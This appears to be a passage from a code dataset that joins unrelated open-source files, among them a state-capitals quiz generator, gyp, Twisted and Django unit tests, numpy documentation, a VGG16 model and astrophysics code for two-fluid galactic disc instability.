value[ReduceFunctionBuilder.LARGEST_MATCHING_PERIOD] < value[ReduceFunctionBuilder.CURRENT_MATCHING_PERIOD] @staticmethod def __set_largest_period(x, y): y[ReduceFunctionBuilder.LARGEST_MATCHING_PERIOD] = x[ReduceFunctionBuilder.CURRENT_MATCHING_PERIOD] y['period_start'] = x[ReduceFunctionBuilder.TIMESTAMP] def __copy_largest_period(self, x, y): if self.__has_largest_period(x): y[self.LARGEST_MATCHING_PERIOD] = x[self.LARGEST_MATCHING_PERIOD] y['period_start'] = x[self.TIMESTAMP] @staticmethod def __has_largest_period(value): return ReduceFunctionBuilder.LARGEST_MATCHING_PERIOD in value
davidzyx/PythonNotes
refs/heads/master
Part II/ch08_project01.py
1
#! python3 # Project: Generating Random Quiz Files # Say you're a geography teacher with 35 students in your class and you want to give a pop quiz on # US state capitals. Alas, your class has a few bad eggs in it, and you can't trust the students # not to cheat. You'd like to randomize the order of questions so that each quiz is unique, making # it impossible for anyone to crib answers from anyone else. Of course, doing this by hand would # be a lengthy and boring affair. Fortunately, you know some Python. # Creates 35 different quizzes. # Creates 50 multiple-choice questions for each quiz, in random order. # Provides the correct answer and three random wrong answers for each question, in random order. # Writes the quizzes to 35 text files. # Writes the answer keys to 35 text files. # This means the code will need to do the following: # Store the states and their capitals in a dictionary. # Call open(), write(), and close() for the quiz and answer key text files. # Use random.shuffle() to randomize the order of the questions and multiple-choice options. import random, os os.chdir('./Part II/ch08') try: os.makedirs('./proj1') print('Folder proj1 created.') except FileExistsError: print('Folder proj1 already created.') os.chdir('./proj1') # The quiz data. Keys are states and values are their capitals. capitals = {'Alabama': 'Montgomery', 'Alaska': 'Juneau', 'Arizona': 'Phoenix', 'Arkansas': 'Little Rock', 'California': 'Sacramento', 'Colorado': 'Denver', 'Connecticut': 'Hartford', 'Delaware': 'Dover', 'Florida': 'Tallahassee', 'Georgia': 'Atlanta', 'Hawaii': 'Honolulu', 'Idaho': 'Boise', 'Illinois': 'Springfield', 'Indiana': 'Indianapolis', 'Iowa': 'Des Moines', 'Kansas': 'Topeka', 'Kentucky': 'Frankfort', 'Louisiana': 'Baton Rouge', 'Maine': 'Augusta', 'Maryland': 'Annapolis', 'Massachusetts': 'Boston', 'Michigan': 'Lansing', 'Minnesota': 'Saint Paul', 'Mississippi': 'Jackson', 'Missouri': 'Jefferson City', 'Montana': 'Helena', 'Nebraska': 'Lincoln', 'Nevada': 'Carson City', 'New Hampshire': 'Concord', 'New Jersey': 'Trenton', 'New Mexico': 'Santa Fe', 'New York': 'Albany', 'North Carolina': 'Raleigh', 'North Dakota': 'Bismarck', 'Ohio': 'Columbus', 'Oklahoma': 'Oklahoma City', 'Oregon': 'Salem', 'Pennsylvania': 'Harrisburg', 'Rhode Island': 'Providence', 'South Carolina': 'Columbia', 'South Dakota': 'Pierre', 'Tennessee': 'Nashville', 'Texas': 'Austin', 'Utah': 'Salt Lake City', 'Vermont': 'Montpelier', 'Virginia': 'Richmond', 'Washington': 'Olympia', 'West Virginia': 'Charleston', 'Wisconsin': 'Madison', 'Wyoming': 'Cheyenne'} # Generate 35 quiz files. for quizNum in range(35): # Create the quiz and answer key files. quizFile = open('capitalsquiz%s.txt' % (quizNum + 1), 'w') answerKeyFile = open('capitalsquiz_answers%s.txt' % (quizNum + 1), 'w') # Write out the header for the quiz. quizFile.write('Name:\n\nDate:\n\nPeriod:\n\n') quizFile.write((' ' * 20) + 'State Capitals Quiz (Form %s)' % (quizNum + 1)) quizFile.write('\n\n') # Shuffle the order of the states. states = list(capitals.keys()) random.shuffle(states) # random # Loop through all 50 states, making a question for each. for questionNum in range(50): # Get right and wrong answers. correctAnswer = capitals[states[questionNum]] wrongAnswers = list(capitals.values()) del wrongAnswers[wrongAnswers.index(correctAnswer)] wrongAnswers = random.sample(wrongAnswers, 3) answerOptions = wrongAnswers + [correctAnswer] random.shuffle(answerOptions) # Write the question and the answer options to the quiz file. quizFile.write('%s. What is the capital of %s?\n' % (questionNum + 1, states[questionNum])) for i in range(4): quizFile.write(' %s. %s\n' % ('ABCD'[i], answerOptions[i])) quizFile.write('\n') # Write the answer key to a file. answerKeyFile.write('%s. %s\n' % (questionNum + 1, 'ABCD'[answerOptions.index(correctAnswer)])) quizFile.close() answerKeyFile.close()
amite/ghostblog
refs/heads/master
node_modules/grunt-sass/node_modules/node-sass/node_modules/pangyp/gyp/pylib/gyp/common_test.py
2542
#!/usr/bin/env python # Copyright (c) 2012 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Unit tests for the common.py file.""" import gyp.common import unittest import sys class TestTopologicallySorted(unittest.TestCase): def test_Valid(self): """Test that sorting works on a valid graph with one possible order.""" graph = { 'a': ['b', 'c'], 'b': [], 'c': ['d'], 'd': ['b'], } def GetEdge(node): return tuple(graph[node]) self.assertEqual( gyp.common.TopologicallySorted(graph.keys(), GetEdge), ['a', 'c', 'd', 'b']) def test_Cycle(self): """Test that an exception is thrown on a cyclic graph.""" graph = { 'a': ['b'], 'b': ['c'], 'c': ['d'], 'd': ['a'], } def GetEdge(node): return tuple(graph[node]) self.assertRaises( gyp.common.CycleError, gyp.common.TopologicallySorted, graph.keys(), GetEdge) class TestGetFlavor(unittest.TestCase): """Test that gyp.common.GetFlavor works as intended""" original_platform = '' def setUp(self): self.original_platform = sys.platform def tearDown(self): sys.platform = self.original_platform def assertFlavor(self, expected, argument, param): sys.platform = argument self.assertEqual(expected, gyp.common.GetFlavor(param)) def test_platform_default(self): self.assertFlavor('freebsd', 'freebsd9' , {}) self.assertFlavor('freebsd', 'freebsd10', {}) self.assertFlavor('openbsd', 'openbsd5' , {}) self.assertFlavor('solaris', 'sunos5' , {}); self.assertFlavor('solaris', 'sunos' , {}); self.assertFlavor('linux' , 'linux2' , {}); self.assertFlavor('linux' , 'linux3' , {}); def test_param(self): self.assertFlavor('foobar', 'linux2' , {'flavor': 'foobar'}) if __name__ == '__main__': unittest.main()
gfyoung/numpy
refs/heads/master
numpy/doc/misc.py
19
""" ============= Miscellaneous ============= IEEE 754 Floating Point Special Values -------------------------------------- Special values defined in numpy: nan, inf, NaNs can be used as a poor-man's mask (if you don't care what the original value was) Note: cannot use equality to test NaNs. E.g.: :: >>> myarr = np.array([1., 0., np.nan, 3.]) >>> np.nonzero(myarr == np.nan) (array([], dtype=int64),) >>> np.nan == np.nan # is always False! Use special numpy functions instead. False >>> myarr[myarr == np.nan] = 0. # doesn't work >>> myarr array([ 1., 0., NaN, 3.]) >>> myarr[np.isnan(myarr)] = 0. # use this instead find >>> myarr array([ 1., 0., 0., 3.]) Other related special value functions: :: isinf(): True if value is inf isfinite(): True if not nan or inf nan_to_num(): Map nan to 0, inf to max float, -inf to min float The following corresponds to the usual functions except that nans are excluded from the results: :: nansum() nanmax() nanmin() nanargmax() nanargmin() >>> x = np.arange(10.) >>> x[3] = np.nan >>> x.sum() nan >>> np.nansum(x) 42.0 How numpy handles numerical exceptions -------------------------------------- The default is to ``'warn'`` for ``invalid``, ``divide``, and ``overflow`` and ``'ignore'`` for ``underflow``. But this can be changed, and it can be set individually for different kinds of exceptions. The different behaviors are: - 'ignore' : Take no action when the exception occurs. - 'warn' : Print a `RuntimeWarning` (via the Python `warnings` module). - 'raise' : Raise a `FloatingPointError`. - 'call' : Call a function specified using the `seterrcall` function. - 'print' : Print a warning directly to ``stdout``. - 'log' : Record error in a Log object specified by `seterrcall`. These behaviors can be set for all kinds of errors or specific ones: - all : apply to all numeric exceptions - invalid : when NaNs are generated - divide : divide by zero (for integers as well!) - overflow : floating point overflows - underflow : floating point underflows Note that integer divide-by-zero is handled by the same machinery. These behaviors are set on a per-thread basis. Examples -------- :: >>> oldsettings = np.seterr(all='warn') >>> np.zeros(5,dtype=np.float32)/0. invalid value encountered in divide >>> j = np.seterr(under='ignore') >>> np.array([1.e-100])**10 >>> j = np.seterr(invalid='raise') >>> np.sqrt(np.array([-1.])) FloatingPointError: invalid value encountered in sqrt >>> def errorhandler(errstr, errflag): ... print("saw stupid error!") >>> np.seterrcall(errorhandler) <function err_handler at 0x...> >>> j = np.seterr(all='call') >>> np.zeros(5, dtype=np.int32)/0 FloatingPointError: invalid value encountered in divide saw stupid error! >>> j = np.seterr(**oldsettings) # restore previous ... # error-handling settings Interfacing to C ---------------- Only a survey of the choices. Little detail on how each works. 1) Bare metal, wrap your own C-code manually. - Plusses: - Efficient - No dependencies on other tools - Minuses: - Lots of learning overhead: - need to learn basics of Python C API - need to learn basics of numpy C API - need to learn how to handle reference counting and love it. - Reference counting often difficult to get right. - getting it wrong leads to memory leaks, and worse, segfaults - API will change for Python 3.0! 2) Cython - Plusses: - avoid learning C API's - no dealing with reference counting - can code in pseudo python and generate C code - can also interface to existing C code - should shield you from changes to Python C api - has become the de-facto standard within the scientific Python community - fast indexing support for arrays - Minuses: - Can write code in non-standard form which may become obsolete - Not as flexible as manual wrapping 3) ctypes - Plusses: - part of Python standard library - good for interfacing to existing sharable libraries, particularly Windows DLLs - avoids API/reference counting issues - good numpy support: arrays have all these in their ctypes attribute: :: a.ctypes.data a.ctypes.get_strides a.ctypes.data_as a.ctypes.shape a.ctypes.get_as_parameter a.ctypes.shape_as a.ctypes.get_data a.ctypes.strides a.ctypes.get_shape a.ctypes.strides_as - Minuses: - can't use for writing code to be turned into C extensions, only a wrapper tool. 4) SWIG (automatic wrapper generator) - Plusses: - around a long time - multiple scripting language support - C++ support - Good for wrapping large (many functions) existing C libraries - Minuses: - generates lots of code between Python and the C code - can cause performance problems that are nearly impossible to optimize out - interface files can be hard to write - doesn't necessarily avoid reference counting issues or needing to know API's 5) scipy.weave - Plusses: - can turn many numpy expressions into C code - dynamic compiling and loading of generated C code - can embed pure C code in Python module and have weave extract, generate interfaces and compile, etc. - Minuses: - Future very uncertain: it's the only part of Scipy not ported to Python 3 and is effectively deprecated in favor of Cython. 6) Psyco - Plusses: - Turns pure python into efficient machine code through jit-like optimizations - very fast when it optimizes well - Minuses: - Only on intel (windows?) - Doesn't do much for numpy? Interfacing to Fortran: ----------------------- The clear choice to wrap Fortran code is `f2py <https://docs.scipy.org/doc/numpy/f2py/>`_. Pyfort is an older alternative, but not supported any longer. Fwrap is a newer project that looked promising but isn't being developed any longer. Interfacing to C++: ------------------- 1) Cython 2) CXX 3) Boost.python 4) SWIG 5) SIP (used mainly in PyQT) """ from __future__ import division, absolute_import, print_function
m45t3r/i3pystatus
refs/heads/myfork
tests/test_uname.py
22
import os from i3pystatus import uname def test_uname(): KEYS = ("sysname", "nodename", "release", "version", "machine") uref = os.uname() for key in KEYS: um = uname.Uname(format="{" + key + "}") um.init() assert um.output["full_text"] == getattr(uref, key)
TangHao1987/intellij-community
refs/heads/master
python/testData/copyPaste/singleLine/Indent32.dst.py
664
class C: def foo(self): <caret> y = 2
EricMuller/mywebmarks-backend
refs/heads/master
requirements/twisted/Twisted-17.1.0/build/lib.linux-x86_64-3.5/twisted/trial/test/detests.py
16
# Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Tests for Deferred handling by L{twisted.trial.unittest.TestCase}. """ from __future__ import division, absolute_import from twisted.trial import unittest from twisted.internet import defer, threads, reactor from twisted.trial.util import suppress as SUPPRESS from twisted.python.util import runWithWarningsSuppressed class DeferredSetUpOK(unittest.TestCase): def setUp(self): d = defer.succeed('value') d.addCallback(self._cb_setUpCalled) return d def _cb_setUpCalled(self, ignored): self._setUpCalled = True def test_ok(self): self.assertTrue(self._setUpCalled) class DeferredSetUpFail(unittest.TestCase): testCalled = False def setUp(self): return defer.fail(unittest.FailTest('i fail')) def test_ok(self): DeferredSetUpFail.testCalled = True self.fail("I should not get called") class DeferredSetUpCallbackFail(unittest.TestCase): testCalled = False def setUp(self): d = defer.succeed('value') d.addCallback(self._cb_setUpCalled) return d def _cb_setUpCalled(self, ignored): self.fail('deliberate failure') def test_ok(self): DeferredSetUpCallbackFail.testCalled = True class DeferredSetUpError(unittest.TestCase): testCalled = False def setUp(self): return defer.fail(RuntimeError('deliberate error')) def test_ok(self): DeferredSetUpError.testCalled = True class DeferredSetUpNeverFire(unittest.TestCase): testCalled = False def setUp(self): return defer.Deferred() def test_ok(self): DeferredSetUpNeverFire.testCalled = True class DeferredSetUpSkip(unittest.TestCase): testCalled = False def setUp(self): d = defer.succeed('value') d.addCallback(self._cb1) return d def _cb1(self, ignored): raise unittest.SkipTest("skip me") def test_ok(self): DeferredSetUpSkip.testCalled = True class DeferredTests(unittest.TestCase): touched = False def _cb_fail(self, reason): self.fail(reason) def _cb_error(self, reason): raise RuntimeError(reason) def _cb_skip(self, reason): raise unittest.SkipTest(reason) def _touchClass(self, ignored): self.__class__.touched = True def setUp(self): self.__class__.touched = False def test_pass(self): return defer.succeed('success') def test_passGenerated(self): self._touchClass(None) yield None test_passGenerated = runWithWarningsSuppressed( [ SUPPRESS(message="twisted.internet.defer.deferredGenerator was " "deprecated") ], defer.deferredGenerator, test_passGenerated) @defer.inlineCallbacks def test_passInlineCallbacks(self): """ Test case that is decorated with L{defer.inlineCallbacks}. """ self._touchClass(None) yield None def test_fail(self): return defer.fail(self.failureException('I fail')) def test_failureInCallback(self): d = defer.succeed('fail') d.addCallback(self._cb_fail) return d def test_errorInCallback(self): d = defer.succeed('error') d.addCallback(self._cb_error) return d def test_skip(self): d = defer.succeed('skip') d.addCallback(self._cb_skip) d.addCallback(self._touchClass) return d def test_thread(self): return threads.deferToThread(lambda : None) def test_expectedFailure(self): d = defer.succeed('todo') d.addCallback(self._cb_error) return d test_expectedFailure.todo = "Expected failure" class TimeoutTests(unittest.TestCase): timedOut = None def test_pass(self): d = defer.Deferred() reactor.callLater(0, d.callback, 'hoorj!') return d test_pass.timeout = 2 def test_passDefault(self): # test default timeout d = defer.Deferred() reactor.callLater(0, d.callback, 'hoorj!') return d def test_timeout(self): return defer.Deferred() test_timeout.timeout = 0.1 def test_timeoutZero(self): return defer.Deferred() test_timeoutZero.timeout = 0 def test_expectedFailure(self): return defer.Deferred() test_expectedFailure.timeout = 0.1 test_expectedFailure.todo = "i will get it right, eventually" def test_skip(self): return defer.Deferred() test_skip.timeout = 0.1 test_skip.skip = "i will get it right, eventually" def test_errorPropagation(self): def timedOut(err): self.__class__.timedOut = err return err d = defer.Deferred() d.addErrback(timedOut) return d test_errorPropagation.timeout = 0.1 def test_calledButNeverCallback(self): d = defer.Deferred() def neverFire(r): return defer.Deferred() d.addCallback(neverFire) d.callback(1) return d test_calledButNeverCallback.timeout = 0.1 class TestClassTimeoutAttribute(unittest.TestCase): timeout = 0.2 def setUp(self): self.d = defer.Deferred() def testMethod(self): self.methodCalled = True return self.d
duqiao/django
refs/heads/master
tests/view_tests/tests/test_specials.py
330
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.test import SimpleTestCase, override_settings @override_settings(ROOT_URLCONF='view_tests.generic_urls') class URLHandling(SimpleTestCase): """ Tests for URL handling in views and responses. """ redirect_target = "/%E4%B8%AD%E6%96%87/target/" def test_nonascii_redirect(self): """ Tests that a non-ASCII argument to HttpRedirect is handled properly. """ response = self.client.get('/nonascii_redirect/') self.assertRedirects(response, self.redirect_target) def test_permanent_nonascii_redirect(self): """ Tests that a non-ASCII argument to HttpPermanentRedirect is handled properly. """ response = self.client.get('/permanent_nonascii_redirect/') self.assertRedirects(response, self.redirect_target, status_code=301)
alisonbnt/watchtower
refs/heads/master
tower/elements/fire.py
1
exports = { "name": "Fire", "aspects": { "amulets": [ { "item": "warrior", "effect": "health", "description": "With the fire and heat of battle, " "your fouls will perish much faster" }, { "item": "blacksmith", "effect": "hit", "description": "Fire consumes, fire molds, fire refines. " "By using the fire of the forge, your attacks " "will be more accurate" } ], "potions": [ { "item": "oblivion", "effect": "health", "description": "Fire erases. Fire leave no traces. " "By it's power, your enemies will burn and " "no memory will remain, only ashes" }, { "item": "rage", "effect": "hit", "description": "The fire of battle may burn all your enemies. " "Raised hit ratio" } ] }, "traces": ['aries', 'leo', 'sagittarius'] }
abhiskk/fast-neural-style
refs/heads/master
neural_style/vgg16.py
3
import torch import torch.nn as nn import torch.nn.functional as F class Vgg16(torch.nn.Module): def __init__(self): super(Vgg16, self).__init__() self.conv1_1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1) self.conv1_2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1) self.conv2_1 = nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1) self.conv2_2 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1) self.conv3_1 = nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1) self.conv3_2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1) self.conv3_3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1) self.conv4_1 = nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1) self.conv4_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv4_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv5_1 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv5_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv5_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) def forward(self, X): h = F.relu(self.conv1_1(X)) h = F.relu(self.conv1_2(h)) relu1_2 = h h = F.max_pool2d(h, kernel_size=2, stride=2) h = F.relu(self.conv2_1(h)) h = F.relu(self.conv2_2(h)) relu2_2 = h h = F.max_pool2d(h, kernel_size=2, stride=2) h = F.relu(self.conv3_1(h)) h = F.relu(self.conv3_2(h)) h = F.relu(self.conv3_3(h)) relu3_3 = h h = F.max_pool2d(h, kernel_size=2, stride=2) h = F.relu(self.conv4_1(h)) h = F.relu(self.conv4_2(h)) h = F.relu(self.conv4_3(h)) relu4_3 = h return [relu1_2, relu2_2, relu3_3, relu4_3]
Amarchuk/2FInstability
refs/heads/master
core/instabCriteriaSolution.py
1
__author__ = 'amarch' # -*- coding: utf-8 -*- from numpy import * import matplotlib.pyplot as plt from scipy.optimize import * import scipy from scipy.special import * import math def run_once(f): def wrapper(*args, **kwargs): if not globals().has_key(str(f.__name__) + '_plot'): globals()[str(f.__name__) + '_plot'] = True return f(*args, **kwargs) return wrapper # Нахождение критерия неустойчивости в случае двухжидкостной неустойчивости с учетом конечной толщины диска (14) и # нет(13). Используются статьи Rafikov 2001 и Jog,Solomon 1984. Честно пишется аналитическая производная условия # неустойчивости, соответсвующая нужному дисперсионному уравнению, после чего производная приравнивается к нулю и # ищутся корни. Корень, дающий максимальное значение, подставляется в исходное выражение и получаем искомое Qeff. sunR = 4.42 # Звездная величина Солнца в полосе R sunI = 4.08 # Звездная величина Солнца в полосе I G = 4.32 #гравитационная постоянная в нужных еденицах sound_vel = 6 # скорость звука в газе, км/с h_disc = 1 # экспоненциальный размер диска, исправляется ниже I0_plot = False # Полином приближения и граница для эпициклической частоты. epiExpfit = poly1d([0]) epiBorder = 0 def mass_to_light(color): '''Отношение масса светимость вычисляется по калибровке из статьи Bell E. 2003 Table7. Коэффициенты берем для потока полосы R, цвет B-R.''' aR = -0.523 bR = 0.683 return power(10, aR + bR * color) def mass_to_light_Iband(color): '''Отношение масса светимость вычисляется по калибровке из статьи Bell E. 2003 Table7. Коэффициенты берем для потока полосы I, цвет B-R.''' aR = -0.405 bR = 0.518 return power(10, aR + bR * color) def surfaceDensityStarR(massToLight, h_disc, R, mu0_c): '''R полоса''' global I0_plot I0 = 4.255 * math.pow(10, 8 + 0.4 * (sunR - mu0_c)) if not I0_plot: print "#!!!!!!!!!!!!# I0_R = ", massToLight * I0 I0_plot = True return massToLight * I0 * math.exp(-R / h_disc) def surfaceDensityStarI(massToLight, h_disc, R, mu0_c): '''I полоса''' global I0_plot I0 = 4.255 * math.pow(10, 8 + 0.4 * (sunI - mu0_c)) if not I0_plot: print "#!!!!!!!!!!!!# I0_I = ", massToLight * I0 I0_plot = True return massToLight * I0 * math.exp(-R / h_disc) def surfaceDensityStarForTwoDiscs(massToLight, h_1, mu0_c_1, h_2, mu0_c_2, R): '''Звездная плотность в случае работы с двумя звездными дисками.''' global I0_plot I1 = 4.255 * math.pow(10, 8 + 0.4 * (sunI - mu0_c_1)) I2 = 4.255 * math.pow(10, 8 + 0.4 * (sunI - mu0_c_2)) if not I0_plot: print "#!!!!!!!!!!!!# I1 = ", massToLight * I1 print "#!!!!!!!!!!!!# I2 = ", massToLight * I2 I0_plot = True return massToLight * I1 * math.exp(-R / h_1) + massToLight * I2 * math.exp(-R / h_2) def surfaceDensityGas(path): '''Возвращяет точки, в которых есть данные по газовой плотности.''' gas_dens = open(path + '/gas_density.dat', 'r') r_g = [] gas_d = [] for line in gas_dens: if line[0] == '#': print line[:-1] else: line = filter(lambda x: x != '', line.split(" ")) r_g.append(float(line[0])) gas_d.append(1.44 * float(line[1])) # Учет молекулярного газа и гелия через фактор 1.44 gas_dens.close() return r_g, gas_d def plotSurfDens(massToLight, h_disc, mu0_c, Rmin, Rmax, step, path, surfDensFunct): r_g, gas_d = surfaceDensityGas(path) xx = arange(Rmin, Rmax, step) @run_once def plot5(): plt.figure(5) plt.plot(xx, [surfDensFunct(massToLight, h_disc, x, mu0_c) for x in xx], '-') plt.plot(r_g, gas_d, 'x', label='gas density') plt.legend() plt.xlabel("$R,\ ''$") plt.ylabel(r"$\Sigma_{s}(R),\ M_{sun}/pc^2$") plt.savefig(path + "/surfDensity.png") plot5() def plotSurfDensForTwoDiscs(massToLight, h_1, mu0_c_1, h_2, mu0_c_2, Rmin, Rmax, step, path): r_g, gas_d = surfaceDensityGas(path) xx = arange(Rmin, Rmax, step) @run_once def plot5(): plt.figure(5) plt.plot(xx, [surfaceDensityStarForTwoDiscs(massToLight, h_1, mu0_c_1, h_2, mu0_c_2, x) for x in xx], '-') plt.plot(r_g, gas_d, 'x', label='gas density') plt.legend() plt.xlabel("$R,\ ''$") plt.ylabel(r"$\Sigma(R),\ M_{sun}/pc^2$") plt.savefig(path + "/surfDensity.png") plot5() def epicyclicFreq_real(poly_gas, R, resolution): '''Честное вычисление эпициклической частоты на расстоянии R.''' return sqrt(2.0 * (poly_gas(R) ** 2) * (1 + R * poly_gas.deriv()(R) / poly_gas(R))) / (R * resolution / 1000) def epicyclicFreq(poly_gas, R, resolution): '''Вычисление эпициклической частоты на расстоянии R - до 1h честно, дальше приближение.''' global h_disc global epiExpfit global epiBorder if R < h_disc: return sqrt(2.0 * (poly_gas(R) ** 2) * (1 + R * poly_gas.deriv()(R) / poly_gas(R))) / (R * resolution / 1000) else: if R < epiBorder: return sqrt(2) * poly_gas(R) / (R * resolution / 1000) else: return math.exp(epiExpfit(R)) def evalEpyciclicFreq(poly_gas, r_ma, path, resolution, h): '''Записываем в глобальную переменную размер диска и рисуем эпциклические частоты.''' global h_disc global epiExpfit global epiBorder h_disc = h kappa = [epicyclicFreq_real(poly_gas, R, resolution) for R in r_ma] approx = [math.sqrt(2) * poly_gas(R) / (R * resolution / 1000) for R in r_ma] expfit = poly1d(polyfit(r_ma, map(math.log, map(abs,approx)), deg=1)) epiExpfit = expfit epiBorder = max(r_ma) used = [epicyclicFreq(poly_gas, R, resolution) for R in r_ma] expf = [math.exp(expfit(r)) for r in r_ma] @run_once def plot13(): plt.figure(13) plt.plot(r_ma, kappa, 'x', label='real') plt.plot(r_ma, approx, '.', label='approx') plt.plot(r_ma, expf, 'x', label='expfit') plt.plot(r_ma, used, '-', label='used') plt.axvline(x=h_disc, ymin=0, ymax=0.05) plt.xlabel("$R,\ ''$") plt.ylabel(r"$\kappa(R),\ km/s/kpc$") plt.legend() plt.savefig(path + "/epicyclic_freq.png") plot13() def Qstar(R, poly_gas, star_density, sigma, resolution): '''Вычисление безразмерного параметра Тумре для звездного диска. Зависит от плотности звезд, дисперсии скоростей и эпициклической частоты. Вычисляется по формулам на стр.4 в двухжидкостном приближении''' return epicyclicFreq(poly_gas, R, resolution) * sigma / (math.pi * G * star_density) def Qgas(R, poly_gas, gas_density, resolution): '''Вычисление безразмерного параметра Тумре для газового диска. Зависит от плотности газа и эпициклической частоты. Вычисляется по формулам на стр.4 в двухжидкостном приближении''' return epicyclicFreq(poly_gas, R, resolution) * sound_vel / (math.pi * G * gas_density) def dimlessWavenumber(k, R, sigma, poly_gas, resolution): '''Вычисление безразмерного волнового числа, где sigma - соответствующая расстоянию R дисперсия звезд.''' return k * sigma / epicyclicFreq(poly_gas, R, resolution) def findTwoFluidQeffs(r_arcs, poly_gas, gas_density, star_density, sigma, path, resolution, kmax): '''Двухжидкостная неустойчивость. Для каждого R из r_arcs строим график 1/Qeff по формуле (13), используя безразмерное волновое число. Затем находим максимум через решение производной и получаем значение Qeff.''' Qeffs = [] plt.figure(14) plt.xlabel(r"$\bar{k}$") plt.ylabel(r"$\frac{1}{Q_eff}$") plt.axhline(y=1) for R in r_arcs: print "#!!!!!!!!!!!!# =========================================" print "#!!!!!!!!!!!!# 2F kinetics: Compute 1/Qeff for R =", R ind = r_arcs.index(R) Qs = Qstar(R, poly_gas, star_density[ind], sigma[ind], resolution) Qg = Qgas(R, poly_gas, gas_density[ind], resolution) dimlessK = [dimlessWavenumber(k, R, sigma[ind], poly_gas, resolution) for k in arange(0.01, kmax, 0.01)] s = sound_vel / sigma[ind] print "#!!!!!!!!!!!!# Star density ", star_density[ind], " gas density ", gas_density[ind], " sigma ", sigma[ ind] print "#!!!!!!!!!!!!# Qs ", Qs, " Qg ", Qg, " s ", s, "kappa", epicyclicFreq(poly_gas, R, resolution) TFcriteria = [] root_for_max = solveDerivTwoFluidQeff(Qs, Qg, s, 0.00001, kmax) max_val = twoFluidQeff(Qs, Qg, s, root_for_max) print "#!!!!!!!!!!!!# Max 1/Qeff ", max_val, " and Qeff = ", 1 / max_val for barK in dimlessK: # Для точности используем i0e(x) = exp(-abs(x)) * i0(x) # Возможно использование асимптотики I_0(x) ~ exp(x)/sqrt(2pi*x) oneToQeff = (1 - scipy.special.i0e(barK ** 2)) * 2 / (Qs * barK) oneToQeff += 2 * s * barK / (Qg * (1 + (s * barK) ** 2)) TFcriteria.append(oneToQeff) plt.plot(dimlessK, TFcriteria, '.', label=str(R)) plt.plot(root_for_max, max_val, 'o') Qeffs.append([R, root_for_max, 1.0 / max_val]) plt.legend() plt.xlim(0, 50) plt.savefig(path + "/qeff_2F_kinem.png") return Qeffs def findTwoFluidHydroQeffs(r_arcs, poly_gas, gas_density, star_density, sigma, path, resolution, kmax): '''Двухжидкостная неустойчивость,гидродинамическое приближение. Для каждого R из r_arcs строим график 1/Qeff по формуле (9), используя безразмерное волновое число. Затем находим максимум через решение производной и получаем значение Qeff.''' Qeffs = [] plt.figure(18) plt.xlabel(r"$\bar{k}$") plt.ylabel(r"$\frac{1}{Q_eff}$") plt.axhline(y=1) for R in r_arcs: print "#!!!!!!!!!!!!# =========================================" print "#!!!!!!!!!!!!# Hydro 2F: Compute 1/Qeff for R =", R ind = r_arcs.index(R) Qs = Qstar(R, poly_gas, star_density[ind], sigma[ind], resolution) Qg = Qgas(R, poly_gas, gas_density[ind], resolution) dimlessK = [dimlessWavenumber(k, R, sigma[ind], poly_gas, resolution) for k in arange(0.01, kmax, 0.01)] s = sound_vel / sigma[ind] print "#!!!!!!!!!!!!# Star density ", star_density[ind], " gas density ", gas_density[ind], " sigma ", sigma[ ind] print "#!!!!!!!!!!!!# Qs ", Qs, " Qg ", Qg, " s ", s, "kappa", epicyclicFreq(poly_gas, R, resolution) TFcriteria = [] root_for_max = solveDerivTwoFluidHydroQeff(Qs, Qg, s, 0.0000001, kmax) max_val = twoFluidHydroQeff(Qs, Qg, s, root_for_max) print "#!!!!!!!!!!!!# Max 1/Qeff ", max_val, " and Qeff = ", 1 / max_val for barK in dimlessK: # Для точности используем i0e(x) = exp(-abs(x)) * i0(x) # Возможно использование асимптотики I_0(x) ~ exp(x)/sqrt(2pi*x) oneToQeff = (2 * barK) / (Qs * (1 + barK ** 2)) oneToQeff += 2 * s * barK / (Qg * (1 + (s * barK) ** 2)) TFcriteria.append(oneToQeff) plt.plot(dimlessK, TFcriteria, '.', label=str(R)) plt.plot(root_for_max, max_val, 'o') Qeffs.append([R, root_for_max, 1.0 / max_val]) plt.legend() plt.xlim(0, 50) plt.savefig(path + "/qeff_2F_hydro.png") return Qeffs def zGas(surfDensStar, surfDensGas, resolution): '''Вычисление вертикального масштаба газового диска в угловых секундах.''' Gz = 0.00432 # гравитационная постоянная в нужных единицах return (sound_vel ** 2) / (math.pi * Gz * ( surfDensStar + surfDensGas)) / resolution def zStar(surfDensStar, surfDensGas, resolution, sigmaZ): '''Вычисление вертикального масштаба звездного диска в угловых секундах.''' Gz = 0.00432 # гравитационная постоянная в нужных единицах return (sigmaZ ** 2) / (math.pi * Gz * (surfDensStar + surfDensGas)) / resolution def plotVerticalScale(surfDensStar, surfDensGas, resolution, sigmaZ, r_ma, path): '''Рисуем картинку с вертикальным масштабом вдоль оси галактики.''' hzGas = [zGas(R[1], R[2], resolution) / 2 for R in zip(r_ma, surfDensStar, surfDensGas)] hzStar = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in zip(r_ma, surfDensStar, surfDensGas, sigmaZ)] @run_once def plot17(): plt.figure(17) plt.xlabel(r"$R,''$") plt.ylabel(r"$h, ''$") plt.plot(r_ma, hzGas, 'o-', label='$h_z^g$') mamamax = max(hzStar) if mamamax > 200: plt.ylim(0,200) else: plt.ylim(0, mamamax) plt.plot(r_ma, hzStar, 'o-', label='$h_z^s$') plt.legend(loc='upper left') plt.ylim(-1) plt.savefig(path + "/vert_scale.png") plot17() def findTwoFluidWithDiscQeffs(r_arcs, poly_gas, gas_density, star_density, sigma, path, resolution, hzStar, hzGas, kmax): 